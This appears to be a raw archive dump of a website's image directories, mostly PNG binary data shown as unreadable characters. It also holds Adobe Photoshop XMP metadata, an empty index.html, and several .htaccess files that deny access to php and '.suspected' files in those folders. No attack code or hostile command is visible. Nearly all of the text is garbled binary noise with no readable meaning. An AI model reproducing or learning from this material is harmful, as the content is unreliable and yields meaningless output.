�_K˧c��~��l&k�D�X�������f4��u%uG#��w�B�s�q�@i�D�w:�>�!�|f��8���ÍO�~<�2;�<=Tv������}�d��3�)�̯�0���7Qo'M2� "�"�r~����&�1���i.̱͒��}-����7A��7NIh�C$�m���`�,[��:Ren��j�VTȧ8~F��%B5on9�}.� ��Sje�)�w��V7!MR���?�O��B':KS�ݴd_����}�%p��b�U�-ڬ��-�7�n�9C�p~V��s�P�~n�M��8�����`�HA�ԑ�r�]#�BO\FZA銹ߣ�ӮԐonvH���H�z�T�����Sb��BL��J3�C�:�Q�+tk
�����rӝ�=��&���3�<�b�[/���ܵ��S�_0H�S㖖���^�jBt�5`���� ���ӌU׃��
�o� 1�*�U�NLר�����y����U��av���kP�'����4��Fy^Q��PfI�!���t�
��Jx��)}mn,Ϛ�񷜤���1* 2��)��c;|8�B��<�Q��F@a�7�hƆ�n��C�9�N��C��!���,�\�P�����?6�=�	��3��8�
��C�A��5}yv#n��?�kN�v]c���4�1�C?@V�{�[b�S}*v~Q��>w{IW/l]#
��M0BS��������I��Y�&
p``���lI+��V�4;J�Ő6q��!���ؼ����xq�-�`�����FL,�������Lߧ��\*vv۪�ڶ�J����9A�=���M�9�K�S7���(��|�j�8����e�6��t�B��8�"���ԁ�)hKQ�s��k�j�E&����0Wkf�4��m�[����fHjf���`_�Y�*-(:⮶c�N����x|ȷ!pm���(
K�
�#(S�%4�c	n�L�I��R����e��ڞ-�m{��Ř�G��ә�Z���W�"7���
���5��MA���0i��Y��$�
������>V�xk�}�1��Υ#1w��G��.�J�
h��J@A���x��I��@��U>���o9S�b�V��+���?C/FG�9f?���M�Jo�B�A�s^��/Y
�bW̙:`E��A��(���L�$N��(�:���,����-!�2��ͱ�:[|�F���)w��O���9�\�}��t��`4Lvh��3���f,�dV1A.6��eC��B���"O�ϴ�~P�r�E�E܀��_ޑ���&vEC�M��	4�y��Ё���z��E&by�֚���L���
�����	�t
X�Vͳ�����e�7tqW��g$�=q�ZD�uK8�,���ԍ-��9��'t@5����kHn>�Y�Em:uOz"�x��׶%3HW��N�j�
s��g�5�K��ל���@��d\�=S|��o�������G���$~
j^+0?:d�`9�ᅲ����-xm��P��0�o2N�IK[�P�,�:�h[ңuU�!ɽ>��[�@j��v5�a���L��N&�������e7�02IFD.1��E<C3�x�`�j�J�r5WՐ,�<��U�qz���r�_�,��g�4���)�&���Y��oYy3B-j2�[7���<B�J�Љsg�z����w:�!yh`��^�]t�R��nf��|�M�:Ɗ�ڰ�����:U��aXdrx
��ǟ����6?�!�O��S(%7e�76�ﺥ��W��PU²7�7���맱�G��q���s�Y��4����Ԥ�M%�O���Ͳ�Ht�v���%)Y���nSW*��5L7�b0c�z68�bл���:��8���ͺ!�(��?�
���qڹ�2+�ח��C/�CO����K8K��2`���—=�,��T&��7�&'��A�<��[�y�cc�3������˓��6**�-�l�84	�j��'�ʚěn�4�ɳ�_J#[��U۾<�׏��D	)N�2��e����>�i�TSc�꩏}o�eJ�1�����[M��[���������.X�C����x��C���b(��:R��ql��zEVlPK�zUTu����ݤ�⏶�.'[�otՈ�S��h�~��q3a&0�a� -N��ah�R��O��8�v8n��e.�]��1���,�� Z�
ks�)�n40��M�ڄS��1�$�]6��Y6����hmDM�K�I�8�Ћ	dL{@e���a]�=�K�~�͔�)�e�� .|�@��f���t�Y,�\�;��ǖ\�oR�51j�3ݥ�U�֭��Y��Yъ:�V�T��+(*a�M(W�B�q���_������M�?��
V:V�r�x�nmS�%܆in-XB*�C�եe�y�c����dž�Y6� &˅�3�У���`��y*K*�r����_Wu~Kc<"fE�a`��_QAYi
�xF�.
a��qW+��BGߡ���$YtՄ�SG���࿾dg6}���^�DQ�2zb�_��K�"�����$�D��mҌ�ۼ�,���������J8�)g�Pʘ"�
�ӊ@��i;��f��H�9���Nt� �D��.e��+2媴������J
�K}ټC���ڇZ��E<H��x�1����{u���}���]l��T�)1CG���^6h�w��:��Ea��n�|���&�GI��:fst�JB��*�
i�
T����2��c�`��me�䆋T+�������"�dz~�֦��V��/>�Vֻ�k�[�p<���|?�Wʬg
f�VE��ѰY�&���ԡ�M4
�j[����7Ov�Ȋ��2I��n�=ClN��Tu)���՝qD������C��������	:V�4���M
Ո���q.
�/�	
a�d��{�C°���a&5��ST����m��+��X��̇���j2��Cx>��~jd@���O"����D6�ޓ�t�V u�K����S��+�3:������`՟�����e5���Jee��M�F�c���	EoJ�������=�)�lWz�NT`Ꞑ��ҡ�9x�Xˑ��˫F��z�n�$�Ԯ�T�֣`�)&���iJ"5qk!�G���3ͻ)���^�FBƲ�~����<7���]~lWz��&vS7bgb1&�C
�!�9?�ݮ]���e�(��DZ����&g:=biAk��1dP�r���Ԥ�L��4)�*�9��/�έ�S)�򸋪�S���0=���ז+uk��!�շ�.69��]��s�s�QB%�T'��{k�oK&(�tJ�53pc��L/x�C#�>6=F����!@ud�e�F�;6Ѣ����#�(G�?��72�.'^�oG2�>��ô��q��Eܔ�6h�Į�s-36A��� $��T�<����&||dߕ��.[㐪�!��$�1W	D艸�j�e��0'���#D;�0�����+-*N��!K�D��#5J� �ԙ��8�g���ի�T�������a֬�jG�Yx/4�����'WmJ�%�Uu5eʄ���
`�����$�Zvt����\�+$5�����x3��M��:�(�}�m������@KR��h�b����åJ�L#�".c�S����M�m��R)
�����X���o�ї��,�k	�qTTU��ȶR�:�ezm���4�H�>6S,+���2"�|�E�ǫa�{j'8³��KK�i�>�0�ќ�j�s<�)6i�忸Ë́���H�KU�9��v G���2Eb��ZU��u+Z��9�l]q���&y�~�i����@����G��D���Y�8_[���w��Ѕ�ΈӤ��^?����
�6��y�%�\Cf`S��#��Ҏ���{�R�����>�I�Rڡ�lү�(F���x$�b����Q�C@�*���ߕ���g*Z
o�|�b,��;@e�cc\5���\�O�cW$
=I�*)��	݉2����x��=�&���\���24��v�(ܹ��)N]��!h��~�	�U��1e�`b��Z�J}ӷ�S٘�<S��
dǩ(��m��"5q�
�N&Rh���
�85����^�q䡟.�Z��)��&�>n^��&��jL��y!�D��|�kb�_-�FW�`�W��F�q}.���D�Kи�
|�ȋnƤ�8�<���C�3T�`�K���gV�6I
�Y��z%�� Ǥ�+�k��NWW@��؇dym>1^V.�HZ�trU3Iӎ���;	����23
�$Z��d^?�R��R��u ���hO�Սn_̅1M��J>��ܒ��C�8#0�F&v0�nM�C�8b��0ps,�ª)��V�v!DAd���:eMww��B�R[���jU��!��&[��C�3(}��8`,{�MJ��G���(��uK���\��[�ȡ3���MEo�r3�.=W�hD�D��M~��`�	=n�-�Yˏ�]Ъ�5Xk��|>ӓ�>(X+kk#L��fc�)59��_�kA�Hշ[@�;��G��TdY���8W=J�6�@X8<ِuk�]���|�8x�A�T�J���c�J�U%{}�o7u�ǹJ*E�b<V�iT}��-:�J���р������Ft�J�if��S��-�f^�4��6�ޏ�]Z�L��.�aT�U?%��wq���S�O�&�$ݻo/u�'�2���e���&�e%%g�8�p
�N�Jy�>��enN��f	G@Ƨі�:�e�Or�T���*�Q���K������0��{�&r��WaՆ�ʠ��4hkCN�$��2�>/�@S{Vi.�^��c�I�I{�O�����V��򞏏M�����f)i�87쫋%���lqZM,Yn�8y��R�����w�7���	Q��f�O��R*�&'�biD�E�`��B��zH����Y��AdDE�i>���׮���mb\1��y�/��ɿa�	�7�C����8=ҡ�Ȟ$���ir(C���U��K30���f}|n�C��H��`)�ށ9]|w$GJ���a{�/�z�SSW�%8^�����D�mI[\IEND�B`�images/03/03/percentage_arrow.png000060400000002246152434416630012522 0ustar00�PNG


IHDR"�_�8tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:017D5E7B52B211E383D6D6B9E0D32266" xmpMM:DocumentID="xmp.did:017D5E7C52B211E383D6D6B9E0D32266"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:017D5E7952B211E383D6D6B9E0D32266" stRef:documentID="xmp.did:017D5E7A52B211E383D6D6B9E0D32266"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>���IDATx�b�-mg�����K����(?ŀ	0E�����çce��2��?&lv|�3V��c�@����>|�4Pҥ�?�X��s������Ԛ�O?|Nԑ7�b�`���G�����0mȚg�?E�K�ʊ0�0=��9@E�I^����	dL��4LR��n?���}� %ȷ��Ӄ�^��`�����cO����M҂|�<:��-
���$�;���3/����M���Лy�hh
�&���]|���ր�%x�]�w�J~�j�{b%-R�IEND�B`�images/03/previous.png000060400000002367152434416630010631 0ustar00�PNG


IHDR)��)tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows" xmpMM:InstanceID="xmp.iid:E1DFB634237411E3A0FBF82F1EC8451C" xmpMM:DocumentID="xmp.did:E1DFB635237411E3A0FBF82F1EC8451C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E1DFB632237411E3A0FBF82F1EC8451C" stRef:documentID="xmp.did:E1DFB633237411E3A0FBF82F1EC8451C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>@�kIDATxڜ��n�0�Q��8q�PoF"����#�!�@bxt�̌�uО���~i{(!K�T|���~�!AKhp����-���x���pI��V>IV�����',�K�U�O���GQ���*�
��n��E�q{�W[
>��0�~�� 7�
�|Ɨ���vc<9%�^����'I�+8M�z��9��I�,[�VY`x]p�����h4���l:�%�E�q�<*�ղm�ח���n/BCڒ���I��|>g�Ao�.���oY� ��r��Z��뙦Y�k6��(��*�g�C�~��Y�C00�!���:C��p:�"1d8M&$���cMӠ!0~(�
��%�.�C�.�IEND�B`�images/03/next.png000060400000002473152434416630007731 0ustar00�PNG


IHDR)U�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows" xmpMM:InstanceID="xmp.iid:5AFF3790237411E39315D3E8DFB151A1" xmpMM:DocumentID="xmp.did:5AFF3791237411E39315D3E8DFB151A1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5AFF378E237411E39315D3E8DFB151A1" stRef:documentID="xmp.did:5AFF378F237411E39315D3E8DFB151A1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>����IDATxڜV�N�P�}�NJ�" R�e	�H��� K���R�"�!AD���Hdig�>���;3g�\R,8��(ʆ
j0��u�0�x���i��Q�\[�f���ئ=�L$�*�N�^F#Y�m� �PNE���v�9�i��(&;��г�v�]3Ot�힪��8��IQ�~�8�	�GI�G(Ng�j����!
SEu�@)�F�!��*��
c{_��f3z��F�\~��RX�
�(�Jo��/�e��l6�b�}����X�ׅ|�c�bi{@�8�ۑx�_�F���(�,�b� �\.w�p`��l6{�tb�O�d2�.F�`�ǃ�*��x�����G�"��H����7��Aq�#<� ���y�G�H8�!��u0G�_hr2�D�+�t�|����4��r��]n7���Z
��Ƨ��f��TIEND�B`�images/03/.htaccess000044400000000424152434416630010037 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/03/upload.png000060400000004537152434416630010242 0ustar00�PNG


IHDR P,�tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:29DB84F1099811E382248B9C908170C5" xmpMM:DocumentID="xmp.did:29DB84F2099811E382248B9C908170C5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:29DB84EF099811E382248B9C908170C5" stRef:documentID="xmp.did:29DB84F0099811E382248B9C908170C5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>I^��IDATx��WYoW�����3�cǎ7E�Q(����R	�T�<�j��?"B��K��HH�!��*l�J)�iP��)��x�񾌗~�ؑSb
/e����]�w��wƪs��}J&��a���'ߋ�/_f޴�^��~�`�J�j��n�f��Fce��EQG�Q>[����D2i�$�Q,�G��:<2��ݾ7x<?�w�ڵ/�0��N�+p�4	B
@��E�e�!��N��b�\�Vut}�9�n� %I�;w��I<gS��;���}�PK���6�@(�,>�Z��pFc1w.������Ƣ���굚�T.���) ���Nz��d�ѼW*[����d�8{�8!����8~�أm\�t�t:mmN0L�z�;)�˳r29�4�q��^o���@���h�j�Ɗ�s&�Egh(���5���D"A6��j$�7>�
�|>OΜ9C�^o�…L,#v�U��T�ij*�

-||�У��1XVo�8���YN`��ǭz�ɤ��ϧ5�]g��ex�-�����1'��~����I���=>��{TG���V�j�B�x�{�	��j``@�]�b�Z%j�����R�(�J����e]�H�!t����
sFz6*(�5���nn�6Z����<�=������2:2R��|���ʡ�w�~x�޽��O���z<����y�p��KZ�0nG4���
�R)txt�gpdq���Wa<����['1@�t
Y���lE9�5�u�f��d2i!��n�٢K�L�!�7Kly��/�J,}�������ԙ��GZL�j��JN{�?z~�V�%�G[����l.g�HW��p��߸q��g@
�.^�i�\�O(c
�
z����
�����(���3 \4���7�޾s�B�%e(�*����(�f�!V"�#�DJ�t:<ǥZ�z����7���e�hhHii�^��6�;�l6k�M�X*	��)P�D��tF�tvS9���W���FFG�5j5���x��5T�P�����R�9m$� ���;~pn�+���l@BU�z-��o��7����,�,�V<}}ʎ@�<�!*&C�^7�-!=,�ǖ�z[U�F��x������5s���f���t����
MˁAfgg7�QpP�,r��x�=^o��k�T�>��
��|[;�����⢀Қ��R�P��^H�L�i��PDBٍ�ԣT*��ښ�V��K[F��K��=`�X(����OP�N����]�z@sx<BӁ��E1�L��*�iԠ)M~ *
�`x�V$��`��raX�E�L�������8��&��8<��	�I��K۷�)�<�&��oG'4�v��RF�ӝ�t�u��:��^z 6FA��Pcq�q��ϗ����t���ҶPF�T<���eL������#X'ŝ�2�IEND�B`�images/03/nextbg.png000060400000001633152434416630010237 0ustar00�PNG


IHDR�wS�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows" xmpMM:InstanceID="xmp.iid:F15BAFBD236F11E3BB37AA3A7261DE62" xmpMM:DocumentID="xmp.did:F15BAFBE236F11E3BB37AA3A7261DE62"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F15BAFBB236F11E3BB37AA3A7261DE62" stRef:documentID="xmp.did:F15BAFBC236F11E3BB37AA3A7261DE62"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>i��IDATx�bX�z5@�	�Sr�IEND�B`�images/03/02/01.png000060400000002265152434416630007413 0ustar00�PNG


IHDR�]h=tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:13CCBE2352A711E3BDA1A75A071F1933" xmpMM:DocumentID="xmp.did:13CCBE2452A711E3BDA1A75A071F1933"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:13CCBE2152A711E3BDA1A75A071F1933" stRef:documentID="xmp.did:13CCBE2252A711E3BDA1A75A071F1933"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>3��-)IDATx�b�b`x�@��@30j��f4��M||ܔ)<<ě��˗E99G.Dd�e`�����ŋ�ׯW��ᕐ ���.,pw��w�oTq,FU�}���…܂�2ff��=1u����/^����b4�c`���ϝm��]�������%>|X����?��ʈ�x�d`P���\�B��Y�����#"�=z��^쮆�?�>~��p!���##��uv.��{���/�aE�h ����߿{{��:qB\WwmB��Y�����P�2_^�[���0��N�8/Ë�2d�
`��o��9�IEND�B`�images/03/02/index.html000060400000000042152434416630010451 0ustar00<!DOCTYPE html><title></title>
images/03/02/percentage_arrow.png000060400000002227152434416630012520 0ustar00�PNG


IHDR"�_�8tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:A8CF269052A711E3A621A09295E4D995" xmpMM:DocumentID="xmp.did:A8CF269152A711E3A621A09295E4D995"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A8CF268E52A711E3A621A09295E4D995" stRef:documentID="xmp.did:A8CF268F52A711E3A621A09295E4D995"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��+IDATx�b,��e�������~v���ŀ������}}�ܰ�HHC���߿LX�0�ˣ�P�Z��gz��T	+�����3��4Qj&�O�j%&���0�0���'ia�@�h�Zx���
�0Εd��h	��300222�0�HI�Y���}����6�Z���C��j@�n,Y��1ZZ�IZ�ڂ/N���50��Ο���ZZ�+�f��p��րm▒�8}��K�hi
�"&&I�KӦQ�O�j
 �E�b"�z�IEND�B`�images/03/02/.htaccess000044400000000424152434416630010260 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/03/02/bg.png000060400000050137152434416630007564 0ustar00�PNG


IHDRQ7�,��tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:FC217D2252AA11E39392A4EFE1C60604" xmpMM:DocumentID="xmp.did:FC217D2352AA11E39392A4EFE1C60604"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FC217D2052AA11E39392A4EFE1C60604" stRef:documentID="xmp.did:FC217D2152AA11E39392A4EFE1C60604"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>{�[1L�IDATxڌ}��#��\UM�Y��g|ZI�"��>�μ�n�!Pf%�bC�f��l�Ѩ���,�f�,�~h����̿l�����ׯ������9�i�}���k����|ܘ��z�ۀ��n�:;\�x�}����ێ�6���������j�x��Y���]l�՘��Vf]^���]��Z�>�H?t<�̫�}~D���R�k�����~�Z�\��Xw6`���U���Ul^�5�����O�B~6�T���xo�>?���{{~㵭p�_\�uk*��<߰�&��;|�ח*��G�`7���f��[�������!��y����~db���EU6��f�o��$��y]m�/^�_wT�=��Q����;�n����ή�_�/�(�u�����?���u��k����{���0V��k����Y�g���yI�\�����ߟ��OX����_x���\�k��6~��c8?槬u�]�篿���<�������e�|�x~�m�y������||^����O�oϗ���U`�ۼ������y�����ÜO����������k�^�������npc�\��Cp�i��������V�I�s�9��Kl�C���Y�m@���U��/��gl�G�
�r�M��{��4�l��;�U:ab�ˀU���'�~�����bb������o�|�~�����y��N�\j�+�#Z<�0Z�����]R���9��f�8�>�A`+�}��Tx`1o~�1/uE���C��|g���V�[��u��ʛ���ub*�������������>��1�P�wu>&k���p9�ɽ�:�|ۀ�}-�!������/��ax�_}�;~>����1��L.��Vz�s�����u�>��=�������êϋ��63(���5�+3�ye?�\��+���׆���3=gOH�R�.�b�u�G�AΎ5G���H��}��AV;8L⃄��J0SIT �jTü��R��X�U8��w�z�;Ge�+�cs�K��:|G�=��NJg�T�+�?�Q�;�X����F�}�.�b��U�
�r�Q�t�vXd���)��O_�9�S��E�6�"�ӣ����iE����a�3�e�'ߚU"����9+G���:��+7��yp�Z���ܟ*��n�.,��ѹ�y��I���:�����Y��]� �?�5t��@�g�U�ڴ�\7�gQ����
�5�28�^o�7�uL;+ʆ.������5�Y�ө�E{���1\˷y=�7� [��U����ًS��L
}�"���j�������B���e�����7�'G�q��l��:�/�=i��̹P�ς�o�%�K��:�38V �������X��0:�ux=P	|(p(�C�sj�MC҂���*���;s�̅T �9�}}���_:�<5���逯�
��U�p����u�y���	7��RC���v�WbJ��;<D��0Tk��
��򔟭���18`�V�Uq���W%��f��\�ޙ�kӴ���W�a�
�W���;_�Pԯ�I:��y�'��>CZ0X BT>㫃s�ΘB�6@��W��Լ�q�Y�z0��i�	2hI� W��]��1��6���|�/8
VB���Uh��78��'7h�ٵ΍:���
��1��U_�������[����i�8�?$ι�,���OQCHj�7�h\��&�\{l.�-�HD�T*.���£�3�c�T�t��
�Ƀݥ<
y��Z�=��J_��s�w���]���n{�mmr쮜+��⇩�v���������d�7	6�:W�
́���WK��Y��g��c����{�P���$`%����@��Q�u�pw��H�9�`�`@�rr�k���ܕ�y�?�GXS�!�P����,oP֬X��M�c���	_pU{��ՠ: �rlV BpͲ�'�spݎs^�ʽ��ߣ�Hg^��9طC�H��7@�+����R�z��t��\;,��	�\u�|��;�9�`�;ܚ������CT:ww��;�!V'��~��Ǎ��s��`Р��%A�4A�����H��f������5�b>��h�����־ǭV�؂!� ��'�+$�S��دI������D�Hs2�E�3�DʙLړ�7q��ΟW{�q��t�8F�";�C��'c"9���U�8'ax��V (���W�Ѵ	_|e�x�t$cRUap���]����J��S�����K]��C��䰖:��t9:4z�?O�4q/n�;�����U��)[ G�H�9q��ހdb78+�Jn�=7qW�|�{q�Ұ�I�z��+
3YAN��n1ȴ|��u~5c6�`(�u���s�1A�.��9�24~�����9&E6.���ʡ�낀�]�����#�:wт1Um�9<�����"��fx��z�B�/BL5�%a�uH��H��qI��t(��܈��^T����3�3��Zq���o�g�®H�R�����Y��_ϋ���/�2yU��4��6OF	H�9'nS&�PA�
	��7}t�
f;�ΟK{;h�b�ʱU��P�:A�� Q��_�������6	u�0x��҄hVaͻd]�LL����v���u-���R�vHc4ȡ��.�8*$��P�*����|���Z�>�ߟ��
P��]���eAJg�MZ�����1+�UZ��ޠy�*�OD.BqlH-�͠u����¶��i;�7CWcbEaj��s!��͞.���ʈ�`��Cyp��D�0�X_��h�$<d�&��������I����?�u>f�Wa�_�=��G����K
��!l��AF?E|����{���j�a.\�$���+����]���acա�s~e�'#�}ѕ��ϳ�?!�,l0��0�b��^C"�8C�.��+��G��N(®y�!�8�^
�\���q����āFa;iИ'��g缤�X�/�,���?��{�r�AՅ��ne7.�_�����:t˰V��T9�4�\�: YI<ad�~M�?�vtN�N8S���zd�^����L�!d�#���s�RVA�B
���9D;��.���i�DUnc$(u��!*p�\�~�`��Ʌ%��`Tmw4�&��	�܇�O�V��p����>w.�L���|�ʥ�I��X���`�{‡V.PT��9�|���ser㐷ZJ����@iJ?���3Aԡ�>��\���c	4Ӧ�1�lp�	�Z؅ij�'@I����,�8��/2v�O�]Lc��2��ҩ'l�EɍK�m�����<�7�dN>��{�&_�!u�
/����ƈ%�ɭ�{��u3I͠`�c���Oz���)�7X:���!:�=Y�	<�X/0���H���O�K��7�Bd4�i+ܮS�!���}�ݯ ޒ(4X�Ԋ��s�V.��;`�U�~�7�h{ÊL$.��(��91w���J&v�qoye\���o���g'ߘ%�Jp��B/��J����K�3�C�	F<s�T��g�+Ol��w��3=}���q ���`�3G�RDѡc�B�]�Vw0��z��dLq.�]P�&
6�C�X�!��l��!pL�jp@'%�	ہ��ܾ�̃m�	����1	|� 8���K�~��3�k�
��6?�0p�睫9�9I�d�06@2����@0�S6�N���?��<��1P��Y�Y�&!�ځ�y�&���S��j�`�
c?`�?g)��F���Ne0�aL�Kq>���b{���������i!�'�3x,�ҹq��5���؝�
�vc�LzgFL�tI`M@��+I�.u�vKbpUA�;����r���MMc�
�9�2~IK�v��!d����s�»��هŷ3c��"��l��сx�`�I�x���)ǎ���(�m�尒B����]�E�L������g
� ȧ�3(��l;�De��H[�)@�_�^�"��8Uu�<`O��b�8�t�`rГ�u�}��v��`5���w�q}1e>�ACޔ���:;��q3c�J0��q�?I]�np�XI�����66�i��P��(�o+�;p��j�̊\��x��kl�7J���	���)i��ҽ!O�W(��7�V�k)n�yJu�}���A���G�CV��3�HWc�i��;�o�I���r��'m"ҷ:w\�+TD����)�;�&���G�g���0ы	��7
Q�/���(br/jJ�x���\K���%p}캘E�����H�u��,Y@�����C8Y��5�)�!PS@�[�.z's��j8��r�:��S%�'Gߤ/U��t�$���!�`Ƈ�
��@��j,b.�����Ib�ƹ�*.oD��byO>�A����"�^Q�KL+
���?���v4Ia7�N�������b���JqS��L�Bp0�2�zH��8:�Ј��I���)7��Vc�^$��>�x츯�%�ீ�.��!T�.b�`�d��c�1�;C�U�ԋLnTVNg�}b[X�'��ס�U��ՠ�z��	�TQ%���e�`�%����B�M(S���U���*�kc匸,u���s�`c�S�-g��:+�K,�"�Ǿ#�n�E�%:�m����m�X�b�����D���$
